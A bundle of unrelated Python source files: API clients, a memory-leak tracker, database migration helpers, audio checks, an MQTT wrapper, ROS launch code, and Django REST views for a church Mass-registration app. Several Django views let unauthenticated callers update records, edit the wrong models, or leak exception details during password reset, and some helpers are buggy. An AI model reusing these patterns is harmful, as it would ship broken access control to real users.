'User-Agent': self.user_agent
}
def data(self, endpoint: str) -> dict:
"""
Sends a GET requests to a Dagpi data endpoint
Parameters
----------
endpoint
String containing specific data endpoint
Returns
-------
dict
"""
url = f'{self.url}/data/{endpoint}'
resp = self.session.get(url, headers=self.headers)
if 300 >= resp.status_code >= 200 and resp.headers['Content-Type'] == 'application/json':
return resp.json()
raise DagpiException(resp.status_code)
def image(self, endpoint: str, params: dict) -> tuple[str, bytes]:
"""
Sends a GET requests to a Dagpi image endpoint
Parameters
----------
endpoint
String containing specific data endpoint
params
Dict containing image parameters
Returns
-------
tuple[str, bytes]
"""
url = f'{self.url}/image/{endpoint}/'
resp = self.session.get(url, headers=self.headers, params=params)
if 300 >= resp.status_code >= 200 and resp.headers['Content-Type'].lower() in ('image/png', 'image/gif'):
return resp.headers['Content-Type'].replace('image/', ''), resp.content
raise DagpiException(resp.status_code)
|
##############################################################################
#
# Copyright (c) 2007 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
""" Code from the zope.testing module to help track down memory leaks
TrackRefs works only in a python compiled with the --with-pydebug flag.
An example of how to use TrackRefs in a function is below.
glen = 0
rc = 0
def doit():
newglen = gc.collect()
global glen
if newglen > glen:
print
print "-------------------------------------"
print "more garbage", newglen - glen
glen = newglen
print "-------------------------------------"
print
if refs:
newrc = sys.gettotalrefcount()
global rc
if newrc > rc:
refs.update()
refs.detailed_refcounts(newrc, rc)
rc = newrc
"""
import sys
import gc
class TrackRefs(object):
"""Object to track reference counts across test runs."""
def __init__(self):
self.type2count = {}
self.type2all = {}
self.delta = None
self.n = 0
self.update()
self.delta = None
def update(self):
gc.collect()
obs = sys.getobjects(0)
type2count = {}
type2all = {}
n = 0
for o in obs:
if type(o) is str and o == '<dummy key>':
# avoid dictionary madness
continue
all = sys.getrefcount(o) - 3
n += all
t = type(o)
try:
t = o.__class__
except Exception:
pass
if t in type2count:
type2count[t] += 1
type2all[t] += all
else:
type2count[t] = 1
type2all[t] = all
ct = [(
type_or_class_title(t),
type2count[t] - self.type2count.get(t, 0),
type2all[t] - self.type2all.get(t, 0),
)
for t in type2count.keys()]
ct += [(
type_or_class_title(t),
- self.type2count[t],
- self.type2all[t],
)
for t in self.type2count.keys()
if t not in type2count]
ct.sort()
self.delta = ct
self.type2count = type2count
self.type2all = type2all
self.n = n
def output(self):
printed = False
s1 = s2 = 0
for t, delta1, delta2 in self.delta:
if delta1 or delta2:
if not printed:
print (
' Leak details, changes in instances and refcounts'
' by type/class:')
print(" %-55s %6s %6s" % ('type/class', 'insts', 'refs'))
print(" %-55s %6s %6s" % ('-' * 55, '-----', '----'))
printed = True
print(" %-55s %6d %6d" % (t, delta1, delta2))
s1 += delta1
s2 += delta2
if printed:
print(" %-55s %6s %6s" % ('-' * 55, '-----', '----'))
print(" %-55s %6s %6s" % ('total', s1, s2))
self.delta = None
def detailed_refcounts(self, rc, prev):
"""Report a change in reference counts, with extra detail."""
print (" sum detail refcount=%-8d"
" sys refcount=%-8d"
" change=%-6d"
% (self.n, rc, rc - prev))
self.output()
def type_or_class_title(t):
module = getattr(t, '__module__', '__builtin__')
if module == '__builtin__':
return t.__name__
return "%s.%s" % (module, t.__name__)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning import repository as versioning_repository
from oslo.config import cfg
from glance.common import exception
import glance.openstack.common.log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
def db_version():
"""
Return the database's current migration number
:retval version number
"""
repo_path = get_migrate_repo_path()
sql_connection = CONF.sql_connection
try:
return versioning_api.db_version(sql_connection, repo_path)
except versioning_exceptions.DatabaseNotControlledError as e:
msg = (_("database is not under migration control"))
raise exception.DatabaseMigrationError(msg)
def upgrade(version=None):
"""
Upgrade the database's current migration level
:param version: version to upgrade (defaults to latest)
:retval version number
"""
db_version() # Ensure db is under migration control
repo_path = get_migrate_repo_path()
sql_connection = CONF.sql_connection
version_str = version or 'latest'
LOG.info(_("Upgrading database to version %s") %
version_str)
return versioning_api.upgrade(sql_connection, repo_path, version)
def downgrade(version):
"""
Downgrade the database's current migration level
:param version: version to downgrade to
:retval version number
"""
db_version() # Ensure db is under migration control
repo_path = get_migrate_repo_path()
sql_connection = CONF.sql_connection
LOG.info(_("Downgrading database to version %s") %
version)
return versioning_api.downgrade(sql_connection, repo_path, version)
def version_control(version=None):
"""
Place a database under migration control
"""
sql_connection = CONF.sql_connection
try:
_version_control(version)
except versioning_exceptions.DatabaseAlreadyControlledError as e:
msg = (_("database is already under migration control"))
raise exception.DatabaseMigrationError(msg)
def _version_control(version):
"""
Place a database under migration control
This will only set the specific version of a database, it won't
run any migrations.
"""
repo_path = get_migrate_repo_path()
sql_connection = CONF.sql_connection
if version is None:
version = versioning_repository.Repository(repo_path).latest
return versioning_api.version_control(sql_connection, repo_path, version)
def db_sync(version=None, current_version=None):
"""
Place a database under migration control and perform an upgrade
:retval version number
"""
sql_connection = CONF.sql_connection
try:
_version_control(current_version or 0)
except versioning_exceptions.DatabaseAlreadyControlledError as e:
pass
if current_version is None:
current_version = int(db_version())
if version is not None and int(version) < current_version:
downgrade(version=version)
elif version is None or int(version) > current_version:
upgrade(version=version)
def get_migrate_repo_path():
"""Get the path for the migrate repository."""
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
return path
|
import os
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from in_out import load_sample
import librosa
import numpy as np
from tqdm import tqdm
def check_directory(directory, good_path: str, bad_path:str, checks: list,
max_workers: int = 16):
'''
Runs check_sample on all samples in a directory
Input arguments:
* directory (str): A path to a directory containing one or more
waveform files
* out_path (str): A target path for an output file containing results
* checks (list): A list of callable checks that return False if
the sample passes the check
* max_workers (int=16): The number of parallel workers
'''
futures = []
executor = ProcessPoolExecutor(max_workers=max_workers)
with open(good_path, 'w') as gf, open(bad_path, 'w') as bf:
for p in [os.path.join(directory, fname) for fname in os.listdir(directory)]:
futures.append([p, executor.submit(partial(check, p, checks))])
answers = [(future[0], future[1].result()) for future in tqdm(futures)]
for answer in tqdm(answers):
if answer[1][0]:
bf.write(f"{p}\t{check}\n")
else:
gf.write(f"{p}\n")
def check(path: str, checks: list):
y, sr = load_sample(path)
return check_sample(y, checks)
def check_sample(y:np.ndarray, checks: list):
'''
Returns False if sample passes all checks.
Input arguments:
* y (np.ndarray): A [n] shaped numpy array containing the signal
* checks (list): A list of callable checks that return False if
the sample passes the check
'''
for check in checks:
if check(y):
return True, check.__name__
return False, ""
def signal_is_too_high(y:np.ndarray, thresh: float = -4.5, num_frames :int = 1):
'''
If the signal exceeds the treshold for a certain number of frames or
more consectuively, it is deemed too high
Input arguments:
* y (np.ndarray): A [n] shaped numpy array containing the signal
* thresh (float=-4.5): A db threshold
* num_frames (int=20): A number of frames
'''
db = librosa.amplitude_to_db(y)
thresh_count = 0
for i in range(len(db)):
if db[i] > thresh:
thresh_count += 1
if thresh_count == num_frames:
return True
else:
thresh_count = 0
return False
def signal_is_too_low(y:np.ndarray, thresh: float = -15):
'''
If the signal never exceeds the treshold it is deemed too low
Input arguments:
* y (np.ndarray): A [n] shaped numpy array containing the signal
* thresh (float=-18): A db threshold
'''
db = librosa.amplitude_to_db(y)
return not any(db_val > thresh for db_val in db) |
"""`bucky viz` CLI."""
import multiprocessing
from enum import Enum
from pathlib import Path
from typing import List, Optional
import typer
from ..viz.plot import main as plot_main
app = typer.Typer()
class AdmLevel(str, Enum):
adm0 = "adm0"
adm1 = "adm1"
adm2 = "adm2"
@app.command("plot")
def plot(
ctx: typer.Context,
input_dir: Optional[Path] = typer.Option(None, help="Directory of input data to plot"),
output_dir: Optional[Path] = typer.Option(None, help="Directory for created plots"),
levels: List[AdmLevel] = typer.Option(
["adm0", "adm1"],
"--levels",
"-l",
case_sensitive=False,
help="Adm levels to generate plots of",
),
columns: List[str] = typer.Option(
["daily_reported_cases", "daily_deaths"],
"--columns",
"-c",
help="Columns to plot",
),
num_proc: int = typer.Option(
-1,
"--num_proc",
"-np",
help="Number of parallel procs to use",
),
n_hist: int = typer.Option(28, "--nhist", "-nh", help="Number of historical days to include in plot"),
hist_window_size: int = typer.Option(
7,
"--window",
"-w",
help="Window size for rolling mean of plotted historical data points",
),
plot_hist: bool = typer.Option(True, "--plot_hist", help="Plot historical data points"),
plot_fit: bool = typer.Option(True, "--plot_fit", help="Plot historical data fit"),
adm_mapping_file: str = typer.Option(None, help="Location of admin mapping file"),
):
"""`bucky viz plot`, produce matplotlib quantile plots from output files."""
cfg = ctx.obj
if input_dir is None:
base_dir = cfg["system.output_dir"]
input_dir = sorted(base_dir.iterdir(), key=lambda path: path.stat().st_ctime)[-1]
cfg["plot.input_dir"] = input_dir
cfg["plot.output_dir"] = output_dir
cfg["plot.levels"] = [level.name for level in levels]
cfg["plot.columns"] = columns
cfg["plot.n_hist"] = n_hist
cfg["plot.window_size"] = hist_window_size
cfg["plot.plot_hist"] = plot_hist
cfg["plot.hist_data_dir"] = cfg["system.data_dir"]
cfg["plot.plot_fit"] = plot_fit
if adm_mapping_file is None:
cfg["plot.adm_mapping_file"] = cfg["system.data_dir"] / "adm_mapping.csv"
else:
cfg["plot.adm_mapping_file"] = adm_mapping_file
# Number of processes for pool
if num_proc == -1:
num_proc = multiprocessing.cpu_count() // 2
cfg["plot.num_proc"] = num_proc
plot_main(cfg["plot"])
|
#!/usr/bin/env python
import os, sqlite3
# -------------- constants -----------------------------------------
profilAppMain=os.path.join(os.environ["HOME"], ".mozilla/firefox")
profilUser= os.environ["USER"]
profilApp = os.path.join(profilUser,profilAppMain)
# -------------- functions -----------------------------------------
def searchProfil(profilApp):
"all firefox profiles"
for profil in os.listdir(profilApp):
profilFull=os.path.join(profilApp, profil)
searchSqlite(profilFull)
def searchSqlite(profil):
"all sqlite file in each firefox profile"
if not os.path.isdir(profil):
return
sq=[os.path.join(profil,s) for s in os.listdir(profil) if s.endswith(".sqlite")]
print "\n..."+profil[len(profilUser):]
for s in sq:
dirName, fileName=os.path.split(s)
conn = sqlite3.connect(s)
old=os.path.getsize(s)
print fileName+":",
try:
c=conn.cursor()
c.execute("VACUUM") # this is the thing
c.close()
print "done.",
new=os.path.getsize(s)
print new*1.0/old*100,"%"
except:
print "error."
# ----------------- main -------------------------------------------
if __name__=="__main__":
if os.path.isdir(profilApp):
searchProfil(profilApp)
else:
print "Not exist:", profilApp
|
import logging
import paho.mqtt.client as mqtt
logger = logging.getLogger(__name__)
class Mqtt:
def __init__(self, broker, port = 1883, subscription_topic=None, mqtt_callback=None):
self.broker = broker
self.port = port
self.mqtt_callback = mqtt_callback
self.connected_to_mqtt = False
self.subscription_topic = subscription_topic
try:
self.connect_mqtt()
except:
logger.warning("Can't connect to MQTT broker")
def connect_mqtt(self):
self.mq = mqtt.Client()
self.mq.on_connect = self.on_mqtt_connect
self.mq.on_disconnect = self.on_mqtt_disconnect
try:
self.mq.connect(self.broker, self.port)
if self.subscription_topic is not None and self.mqtt_callback is not None:
self.mq.on_message = self.on_mqtt_message
self.mq.subscribe(self.subscription_topic, qos=1)
self.mq.loop_start()
while not self.connected_to_mqtt: pass # busy wait until connected
except:
logger.warning("Failed to connect MQTT broker")
self.connected_to_mqtt = False
raise
def on_mqtt_connect(self, client, userdata, flags_dict, rc):
self.connected_to_mqtt = True
logger.info("Connected to MQTT broker at %s", self.broker)
def on_mqtt_disconnect(self, client, userdata, rc):
self.connected_to_mqtt = False
logger.warning("MQTT broker disconnected")
def on_mqtt_message(self, client, config, msg):
self.mqtt_callback(client, config, msg)
def publish_message(self, topic, message):
self.mq.publish(topic, message)
def disconnect(self):
self.mq.loop_stop()
self.mq.disconnect()
|
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from django.http import Http404
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from django.conf import settings
import sys
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework.views import APIView
from rest_framework.status import HTTP_200_OK, HTTP_400_BAD_REQUEST
from rest_framework.permissions import AllowAny, IsAuthenticated
from .serializers import (
NewFeedSerializer, DetailNewFeedSerializer, ReMassSerializer, RegistrationSerializer, DailyGospelSerializer, ProvinceSerializer, AccountSerializer, MonthlyTopicBrefSerializer, MonthlyTopicSerializer, ChurchSerializer
)
from .producer import publish
from .permissions import IsOwner
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from adminapp.models import MonthlyTopic, NewFeed, Mass, DailyGospel, MassTime, Registration, Church, Province
from core.constants import *
from adminapp.common_messages import *
# Create your viewsets here.
class UserIDView(APIView):
def get(self, request, *args, **kwargs):
return Response({'userID': request.user.id}, status=HTTP_200_OK)
# API Discription
# Name: MonthlyTopicViewSet
# Url:
# Detail:
# Requirements:
# Output:
class MonthlyTopicViewSet(viewsets.ViewSet):
permission_classes = (AllowAny,)
def topic(self, request): # /api/monthly-topic
monthlyTopic = MonthlyTopic.objects.all().order_by(
'-mt_date_edited')[0:1] # Get the newest post
serializer = MonthlyTopicBrefSerializer(monthlyTopic, many=True)
return Response(serializer.data)
# /api/monthly-topic/<str:month> for more detail.
def detail(self, request, month=None):
try:
monthlyTopic = NewFeed.objects.get(mt_month=month, many=True)
serializer = MonthlyTopicSerializer(monthlyTopic)
return Response(serializer.data)
except:
print("End retrieve newfeed error: ", sys.exc_info()[0])
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# /api/monthly-topic/<str:month> update like, share ...
def update(self, request, month=None):
try:
req_auth = request.auth
monthlyTopic = NewFeed.objects.get(mt_month=month)
if(req_auth):
req_user = request.user
req_type = request.data.get('type', '')
if(req_type):
if(req_type == 'like'):
monthlyTopic.mt_post_like += 1
monthlyTopic.save()
serializer = MonthlyTopicSerializer(monthlyTopic)
return Response(serializer.data)
except:
print("End retrieve newfeed error: ", sys.exc_info()[0])
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: getNewFeed
# Url:
# Detail:
# Requirements:
# Output:
class NewFeedViewSet(viewsets.ViewSet):
permission_classes = (AllowAny,)
def getlist(self, request): # /api/newfeed
newfeeds = NewFeed.objects.all().order_by('-nf_date_edited')
serializer = NewFeedSerializer(newfeeds, many=True)
return Response(serializer.data)
# /api/newfeed/<str:pk> for more detail.
def retrieve(self, request, pk=None):
try:
newfeed = NewFeed.objects.get(id=pk)
serializer = DetailNewFeedSerializer(newfeed)
return Response(serializer.data)
except:
print("End retrieve newfeed error: ", sys.exc_info()[0])
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, pk=None): # /api/newfeed/<str:id>
print("Start update newfeed")
newfeed = NewFeed.objects.get(id=pk)
serializer = NewFeedSerializer(instance=newfeed, data=request.data)
if serializer.is_valid():
serializer.save()
print("End update newfeed Successful")
return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
else:
print("End update newfeed error")
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: getChurch
# Url:
# Detail:
# Requirements:
# Output:
class ChurchViewSet(viewsets.ViewSet):
permission_classes = (AllowAny,)
def getlist(self, request): # /api/church
churchs = Church.objects.all()
serializer = ChurchSerializer(churchs, many=True)
return Response(serializer.data)
# /api/church/<str:pk>/detail for more detail.
def retrieve(self, request, pk=None):
try:
church = Church.objects.get(id=pk)
serializer = ChurchSerializer(church)
return Response(serializer.data)
except:
print("End retrieve newfeed error: ", sys.exc_info()[0])
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, pk=None): # /api/newfeed/<str:id>
print("Start update newfeed")
newfeed = NewFeed.objects.get(id=pk)
serializer = NewFeedSerializer(instance=newfeed, data=request.data)
if serializer.is_valid():
serializer.save()
print("End update newfeed Successful")
return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
else:
print("End update newfeed error")
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: ReMassListViewSet
# Serializer: ListRegistrationMassSerializer
# Url: /api/getMass
# Detail: Get list registration that are available
# Requirements:
# Output:
class ReMassListViewSet(viewsets.ModelViewSet):
permission_classes = (AllowAny,)
def getlist(self, request): # /api/getMass
listmasses = Mass.objects.all().order_by(
'-mass_date', '-mass_last_updated_date')
serializer = ReMassSerializer(listmasses, many=True)
return Response(serializer.data)
# /api/getMass/<str:pk> for more detail.
def retrieve(self, request, pk=None):
mass = Mass.objects.get(id=pk)
serializer = ReMassSerializer(mass)
return Response(serializer.data)
# API Discription
# Name: MassRegister
# Serializer: RegistrationSerializer
# Url: /api/massregister
# Detail: register for attending a Mass with authenticated user.
# Requirements: user is authenticated
# Output:
class MassRegister(viewsets.ViewSet):
result = {
STATUS: OK,
CONTENT: BLANK,
}
permission_classes = (IsAuthenticated,)
# /api/massregister/ get user's registration history.
def getlist(self, request, *args, **kwargs):
try:
request_user = request.user
print("Start get "+request_user.username+" registration")
registers = Registration.objects.filter(
registration_user=request_user)
serializer = RegistrationSerializer(registers, many=True)
print("End get "+request_user.username+" registration")
return Response(serializer.data)
except:
print("End get "+request_user.username +
" registration error: ", sys.exc_info()[0])
return Response({ERROR: SYSTEM_QUERY_0001}, status=status.HTTP_404_NOT_FOUND)
def create(self, request): # /api/massregister/ create a new registration for a mass
print("Start create new massregister")
try:
from .controller import singleRegister
request_user = request.user # get requested user
# get id of the Mass (mid)
mass_id = request.data.get(MASS_ID, None)
print(request_user.username +
" request for registration of the Mass: "+str(mass_id))
# get user condition confirmation [ucondi]
user_condition = request.data[USERCONDITION]
# get single register of a Mass for an User
register = singleRegister(mass_id, user_condition, request_user)
# status here maybe approved or waiting
if register[STATUS] != ERROR:
serializer = RegistrationSerializer(register[RESULT])
return Response(serializer.data, status=status.HTTP_201_CREATED)
else: # Register was error
return Response(register, status=status.HTTP_400_BAD_REQUEST)
except:
print("End get user registration error: ", sys.exc_info()[0])
return Response({ERROR: "System error"}, status=status.HTTP_404_NOT_FOUND)
# /api/massregister/<int:rid>/ get registration detail of a user.
def retrieve(self, request, rid=None):
try:
request_user = request.user
registers = Registration.objects.get(
id=rid, registration_user=request_user)
except:
print("End get user registration error: ", sys.exc_info()[0])
return Response({ERROR: SYSTEM_QUERY_0001}, status=status.HTTP_404_NOT_FOUND)
serializer = RegistrationSerializer(registers)
print("End get user registration")
return Response(serializer.data)
def update(self, request, pk=None): # /api/massregister/<str:id>
print("Start update Province")
province = Province.objects.get(id=pk)
serializer = ProvinceSerializer(instance=province, data=request.data)
if serializer.is_valid():
serializer.save()
# publish('Province_updated',serializer.data)
print("End update Province Successful")
return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
else:
print("End update error")
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: reMassListViewSet
# Serializer: ListRegistrationMassSerializer
# Url:
# Detail: Get list registration that are available
# Requirements:
# Output:
class GospelViewSet(viewsets.ViewSet):
def getlist(self, request): # /api/gospel -- get gospel by next 4 days.
gospels = DailyGospel.objects.all().order_by('-nf_date_edited')
serializer = DailyGospelSerializer(gospels, many=True)
return Response(serializer.data)
# /api/gospel/<str:pdate> get gospel by date %Y-%m-%d
def retrieve(self, request, pdate=None):
date = timezone.today()
if pdate:
date = timezone.datetime.strptime(pdate, "%Y-%m-%d").date()
newfeed = NewFeed.objects.get(daily_gospel_date=date)
serializer = NewFeedSerializer(newfeed)
return Response(serializer.data)
# API Discription
# Name: getMassTime
# Serializer: ListRegistrationMassSerializer
# Url:
# Detail: Get list mass schedule
# Requirements:
# Output:
class MassTimeViewSet(viewsets.ViewSet):
# /api/gospel -- get all masstime available by country code, default = JP
def getlist(self, request, country="jp"):
listmasstime = MassTime.objects.all().order_by('-nf_date_edited')
serializer = DailyGospelSerializer(listmasstime, many=True)
return Response(serializer.data)
def retrieve(self, request, pk=None): # /api/gospel/<str:date> get gospel by date
pass
# API Template
class ProvinceViewSet(viewsets.ViewSet):
print("ProvinceViewSet")
def getlist(self, request): # /api/province
provinces = Province.objects.all()
serializer = ProvinceSerializer(provinces, many=True)
# publish('Province_gets',serializer.data)
return Response(serializer.data)
def create(self, request): # /api/province
print("Start create new Province")
serializer = ProvinceSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
# publish('Province_created',serializer.data)
print("End create new Province Successful")
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
print("End create new error")
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def retrieve(self, request, pk=None): # /api/province/<str:id>
province = Province.objects.get(id=pk)
serializer = ProvinceSerializer(province)
return Response(serializer.data)
def update(self, request, pk=None): # /api/province/<str:id>
print("Start update Province")
province = Province.objects.get(id=pk)
serializer = ProvinceSerializer(instance=province, data=request.data)
if serializer.is_valid():
serializer.save()
# publish('Province_updated',serializer.data)
print("End update Province Successful")
return Response(serializer.data, status=status.HTTP_202_ACCEPTED)
else:
print("End update error")
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, pk=None): # /api/province/<str:id>
print("Start delete Province")
if request.user.groups.filter(name=MANAGER).exists():
province = Province.objects.get(id=pk)
province.delete()
# publish('Province_deleted',serializer.data)
return Response(status=status.HTTP_204_NO_CONTENT)
else:
return Response({"error": "You are not Authorized to do this task"}, status=status.HTTP_400_BAD_REQUEST)
# API Discription
# Name: UserCreate
# Serializer:
# Url:
# Detail:
# Requirements:
# Output:
class UserCreate(viewsets.ViewSet):
permission_classes = (AllowAny,)
def create(self, request): # /api/account/
print("Start create new account")
serializer = AccountSerializer(data=request.data)
if serializer.is_valid():
user = serializer.save()
token, created = Token.objects.get_or_create(user=user)
res = {
'status': 'ok',
'data': {
'token': token.key,
'user_id': user.pk,
'confirm': 0,
'email': user.email
}
}
return Response(res, status=status.HTTP_202_ACCEPTED)
else:
res = {
'status': 'error',
'message': serializer.errors
}
return Response(res, status=status.HTTP_226_IM_USED)
def requestPassword(self, request):
res = {
'status': 'error',
'data': {
'token': '',
'user_id': '',
'email': ''
},
'message': ''
}
try:
req_email = request.data.get('email', '')
user = User.objects.get(email=req_email)
if user:
from .controller import userRequestResetPass
if(userRequestResetPass(user, user.username, req_email)):
res['status'] = 'ok'
res['message'] = 'Vui lòng kiểm tra hộp thư đến trong email của bạn để đổi mật khẩu.'
return Response(res, status=status.HTTP_200_OK)
res['status'] = ERROR
res['message'] = 'Email này chưa được đăng ký, xin vui lòng kiểm tra lại'
return Response(res, status=status.HTTP_200_OK)
except:
print("End request reset password error: ", sys.exc_info()[0])
res['status'] = ERROR
res['message'] = SYSTEM_QUERY_0001
return Response(res, status=status.HTTP_200_OK)
def resetPassword(self, request): #
res = {
'status': 'error',
'data': {
'token': '',
'username': '',
'email': ''
},
'message': ''
}
try:
# If authenticated user request reset password.
if(request.auth):
auth_user = request.user
old_password = request.data.get('oldPassword', '')
new_password = request.data.get('newPassword', '')
if(auth_user.check_password(old_password)):
auth_user.set_password(new_password)
auth_user.save()
# Remove security code
userprofile = auth_user.userprofile
userprofile.profile_code = ''
userprofile.save()
token, created = Token.objects.get_or_create(
user=auth_user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['message'] = 'Đổi mật khẩu thành công'
return Response(res, status=status.HTTP_200_OK)
else:
res['status'] = ERROR
res['message'] = 'Mật khẩu cũ không đúng.'
return Response(res, status=status.HTTP_200_OK)
else:
# Else Unauthenticated user request for reseting password from email.
req_usename = request.data.get('username', '')
req_pass = request.data.get('newPassword', '')
re_code = request.data.get('code', '')
user = User.objects.get(username=req_usename)
if user:
userprofile = user.userprofile
if(userprofile.profile_code == re_code):
user.set_password(req_pass)
user.save()
# Remove security code
userprofile = user.userprofile
userprofile.profile_code = ''
userprofile.save()
token, created = Token.objects.get_or_create(user=user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['data']['username'] = req_usename
res['data']['email'] = user.email
res['message'] = 'Đổi mật khẩu thành công'
return Response(res, status=status.HTTP_200_OK)
else:
raise Exception('password', 'Mã bảo mật không đúng')
else:
raise Exception('password', 'Tài khoản không đúng')
except:
print("End request reset password error: ", sys.exc_info()[0])
res['status'] = ERROR
res['message'] = sys.exc_info()
return Response(res, status=status.HTTP_200_OK)
# confirm request api
def confirm(self, request): # /api/account/confirm
res = {
'status': 'error',
'data': {
'token': '',
'username': '',
'confirm': '',
'redirect': ''
},
'message': ''
}
try:
req_usename = request.data.get('username', '')
re_code = request.data.get('code', '')
user = User.objects.get(username=req_usename)
if user:
userprofile = user.userprofile
if(userprofile.profile_code == re_code):
# Remove security code
userprofile = user.userprofile
userprofile.profile_code = ''
userprofile.profile_account_confimred = True
userprofile.save()
token, created = Token.objects.get_or_create(user=user)
res['status'] = 'ok'
res['data']['token'] = token.key
res['data']['username'] = req_usename
res['data']['confirm'] = 1
res['data']['redirect'] = '/account/profile'
res['message'] = 'Xác nhận tài khoản thành công.'
return Response(res, status=status.HTTP_200_OK)
else:
raise Exception('code', 'Mã bảo mật không đúng')
else:
raise Exception('code', 'Tài khoản không đúng')
except:
print("End request reset password error: ", sys.exc_info()[0])
res['status'] = ERROR
res['message'] = sys.exc_info()
return Response(res, status=status.HTTP_200_OK)
# API Discription
# Name: UserCreate
# Serializer:
# Url:
# Detail:
# Requirements:
# Output:
class UserAPIView(APIView):
pass
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument
from launch.actions import IncludeLaunchDescription
from launch.substitutions import LaunchConfiguration
from launch.launch_description_sources import PythonLaunchDescriptionSource
from launch_ros.actions import Node
def generate_launch_description():
# Import the model urdf (load from file, xacro ...)
robot_desc = \
'<?xml version="1.0" ?>'\
'<robot name="will_be_ignored">'\
'<link name="link">'\
'<visual>'\
'<geometry>'\
'<sphere radius="1.0"/>'\
'</geometry>'\
'</visual>'\
'<collision>'\
'<geometry>'\
'<sphere radius="1.0"/>'\
'</geometry>'\
'</collision>'\
'<inertial>'\
'<mass value="1"/>'\
'<inertia ixx="1" ixy="0.0" ixz="0.0" iyy="1" iyz="0.0" izz="1"/>'\
'</inertial>'\
'</link>'\
'</robot>'
# Robot state publisher
params = {'use_sim_time': True, 'robot_description': robot_desc}
robot_state_publisher = Node(
package='robot_state_publisher',
executable='robot_state_publisher',
name='robot_state_publisher',
output='screen',
parameters=[params],
arguments=[])
# Ignition gazebo
pkg_ros_ign_gazebo = get_package_share_directory('ros_ign_gazebo')
gazebo = IncludeLaunchDescription(
PythonLaunchDescriptionSource(
os.path.join(pkg_ros_ign_gazebo, 'launch', 'ign_gazebo.launch.py')),
launch_arguments={'ign_args': '-r empty.sdf'}.items(),
)
# RViz
pkg_ros_ign_gazebo_demos = get_package_share_directory('ros_ign_gazebo_demos')
rviz = Node(
package='rviz2',
executable='rviz2',
arguments=['-d', os.path.join(pkg_ros_ign_gazebo_demos, 'rviz', 'robot_description_publisher.rviz')]
)
# Spawn
spawn = Node(package='ros_ign_gazebo', executable='create',
arguments=[
'-name', 'my_custom_model',
'-x', '1.2',
'-z', '2.3',
'-Y', '3.4',
'-topic', '/robot_description'],
output='screen')
return LaunchDescription([
gazebo,
robot_state_publisher,
rviz,
spawn
])
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from MDRSREID.Networks.create_keypoints_predictor import create_keypoints_predictor
from MDRSREID.Networks.HOReID.HeatmapProcessor import HeatmapProcessor2
class HOReIDScoreMapComputer(nn.Module):
def __init__(self, cfg):
super(HOReIDScoreMapComputer, self).__init__()
self.cfg = cfg
# init skeletion model
self.keypoints_predictor = create_keypoints_predictor(cfg)
self.heatmap_processor = HeatmapProcessor2(cfg=cfg,
normalize_heatmap=True,
group_mode='sum',
norm_scale=cfg.keypoints_model.norm_scale)
def forward(self, in_dict):
"""
:param x: inputs from encoder(ResNet) [N, 2048, 16, 8]
:return:
scoremap: [N, 12+1, 16, 8]
keypoints_condidence: [N, 12+1]
keypoints_location: [N, 17, 2]
"""
heatmap = self.keypoints_predictor(in_dict['im']) # [N, 2048, 16, 8] ==> [N, 17, 64, 32]
out_dict = {}
out_dict['label'] = in_dict['label']
out_dict['heatmap'] = heatmap
scoremap, keypoints_condidence, keypoints_location = self.heatmap_processor(heatmap) # [N, 12+1, 16, 8] [N, 12+1] [N, 17, 2]
out_dict['scoremap'] = scoremap.detach()
